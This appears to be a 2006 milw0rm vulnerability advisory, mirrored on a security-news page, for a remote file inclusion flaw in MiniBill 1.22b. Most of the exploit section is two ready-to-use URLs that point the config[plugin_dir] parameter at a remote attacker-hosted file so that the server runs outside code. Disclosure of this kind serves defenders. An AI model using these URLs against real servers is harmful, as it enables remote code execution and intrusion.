Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Vulnerability: ModernBill Insecure CURL Settings

Уязвимости в CMS WebDirector

phpECard (functions. php) Remote File Inclusion Exploit

ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	30.08.2006
Subject:	MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

########################################################################
#  MiniBill v1.22 Beta  Remote File Inclusion Vulnerability
#
#  Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#
http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?
#
http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-29]